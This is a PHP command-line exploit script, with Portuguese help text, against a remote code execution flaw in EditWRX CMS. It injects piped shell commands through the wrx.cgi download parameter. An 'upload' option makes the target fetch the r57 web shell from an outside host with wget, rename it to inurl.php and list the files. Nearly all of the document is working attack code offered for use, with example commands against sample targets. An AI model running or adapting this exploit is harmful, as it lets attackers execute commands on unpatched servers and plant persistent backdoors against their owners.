Exploit Editwrx PHP

<?php

error_reporting(0);
set_time_limit(0);
ini_set('display_errors', 0);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);

function argumentos($argv, $campo) {
    $_ARG = array();
    foreach ($argv as $arg) {
        if (ereg('--[a-zA-Z0-9]*=.*', $arg)) {
            $str = split("=", $arg);
            $arg = '';
            $key = ereg_replace("--", '', $str[0]);
            for ($i = 1; $i < count($str); $i++) {
                $arg .= $str[$i];
            }
            $_ARG[$key] = $arg;
        } elseif (ereg('-[a-zA-Z0-9]', $arg)) {
            $arg = ereg_replace("-", '', $arg);
            $_ARG[$arg] = 'true';
        }
    }
    return $_ARG[$campo];
}

function validar($argv, $id, $campo) {

    if (isset($argv[$id]) && ereg('--[a-zA-Z0-9]*=.*', $argv[$id]) && !empty($argv[$id])) {

        $validacao = argumentos($argv, $campo);
    }
    return $validacao;
}

function start($url_, $camando_) {

    system("command clear");
    echo "Carregando..\n\n";

    $url_ = "{$url_}editwrx/wrx.cgi?download=;";

    $camando_ = (isset($camando_) && !empty($camando_)) ? $camando_ : NULL;
    if (isset($camando_) && $camando_ == 'upload') {

        echo "UPANDO...\r\n";
        $camando_ = formataComando('wget http://www.r57c99shell.net/shell/r57.txt|');
        request($url_ . $camando_);

        echo "RENOMEANDO...\r\n";
        $camando_ = formataComando('mv r57.txt inurl.php|');
        request($url_ . $camando_);

        echo "LISTANDO ARQUIVOS...\r\n";
        $camando_ = formataComando('ls -la|');
        request($url_ . $camando_);
    } else {

        request($url_ . ($camando_) . "|");
    }
}

function formataComando($comando) {
    $comando = str_ireplace(' ', '%20', $comando);
    return $comando;
}

function request($exploit_) {

    $c = curl_init();
    curl_setopt($c, CURLOPT_URL, "{$exploit_}");
    curl_setopt($c, CURLOPT_HEADER, 1);
    curl_setopt($c, CURLOPT_NOBODY, 0);
    curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($c, CURLOPT_FRESH_CONNECT, 1);
    curl_setopt($c, CURLOPT_VERBOSE, 1);

    $corpo = (curl_exec($c));
    $server = curl_getinfo($c);
    $sys = get_headers($exploit_);

    if (isset($corpo) && $server['http_code'] == 200) {
        system("command clear");
        echo"
\033[01;31m------------------------------------------------------------------------------\n\033[0m
                      -=[\033[01;31mBLOG.INURL.COM.BR\033[0m]=-\n
                   -=[\033[01;31mEXPLOITADO COM SUCESSO\033[0m]=-\n
                         -=[\033[01;31mRESULTADO\033[0m]=-\n

HTTP COD: \033[01;24m{$server['http_code']}\033[0m\r
IP SERVIDOR: \033[01;24m{$server['primary_ip']}\033[0m\r
PORTA SERVIDOR: \033[01;24m{$server['primary_port']}\033[0m\r
SERVIDOR WEB: \033[01;24m{$sys['2']}\033[0m\r
                 \033[01;34m{$corpo}\n\n\033[0m\n
\033[01;31m------------------------------------------------------------------------------\033[0m\n
";
    } else {
        system("command clear");
        echo"\033[01;31m
------------------------------------------------------------------------------\n
                          -=[ERRO]=-\n
                           {$corpo}\n
------------------------------------------------------------------------------\n\033[0m
";
    }
}

if (isset($argv[1]) && $argv[1] == "ajuda") {
    system("command clear");
    echo "
\033[01;31m------------------------------------------------------------------------------\n\033[0m
                             -=[\033[01;31mBLOG.INURL.COM.BR\033[0m]=-\r
                           -=[\033[01;31mEXPLOITADO COM SUCESSO\033[0m]=-\r
                                -=[\033[01;31mRESULTADO\033[0m]=-\n
                                -=[A J U D A]=-\n
EditWRX é vulnerável a execução de código remoto através da falta de filtro function
open() no downloader, que pode ler em comandos canalizados na GET download
Apesar do downloader ser um componente administrativo,
O login Não é necessário para executar  a função \n

\033[01;33mOPÇÃO      DESCRIÇÃO\033[0m\n

\033[01;31murl\033[0m     = ('DEFININDO URL ALVO')\r
\033[01;31mcomando\033[0m = ('COMANDO A SER EXECUTADO NO ALVO')\r
\033[01;31mcomando=upload\033[0m('UPLOAD DE SCRIPT R57')\r
Exemplo de uso\n
php exploit.php \033[01;31m--url=\033[0mhttp://vull.com/ \033[01;31m--comando=\033[0mls\r
php exploit.php \033[01;31m--url=\033[0mhttp://vull.com/ \033[01;31m--comando=\033[0m'ls -la'\r
php exploit.php \033[01;31m--url=\033[0mhttp://vull.com/ \033[01;31m--comando=\033[0m'uname -a'\r
php exploit.php \033[01;31m--url=\033[0mhttp://vull.com/ \033[01;31m--comando=\033[0mupload\n

COMANDOS BÁSICOS LINUX:\r
\033[01;35mhttp://wiki.ubuntu-br.org/ComandosBasicos\033[0m\r
REFERẼNCIA EXPLOIT:\r
\033[01;35mhttp://packetstormsecurity.com/files/109735/EditWRX-CMS-Remote-Code-Execution.html\r
http://blog.inurl.com.br/2013/08/editwrx-cms-executar-codico-remotamente.html\033[0m\r
\033[01;31m------------------------------------------------------------------------------\n\n\033[0m";
    exit();
}
if (isset($_SERVER['argv'][1])) {
    $alvo = validar($_SERVER['argv'], 1, 'url');
} else {
    print"Defina a url alvo.\r\n";
    $alvo = '';
    exit();
}

if (isset($_SERVER['argv'][2])) {
    $comando = (validar($_SERVER['argv'], 2, 'comando'));
    $comando = formataComando($comando);
} else {
    system("command clear");
    echo"
\033[01;31m------------------------------------------------------------------------------\n\n
Defina um parametro comando \r
--comando='seu comando'  \r
ex: --comando=ls \r
Mais duvidas:\n
\033[0mphp exploit.php ajuda\n\n\033[01;31m
------------------------------------------------------------------------------\033[0m\n\n";
    exit();
}

echo start($alvo, $comando);
?>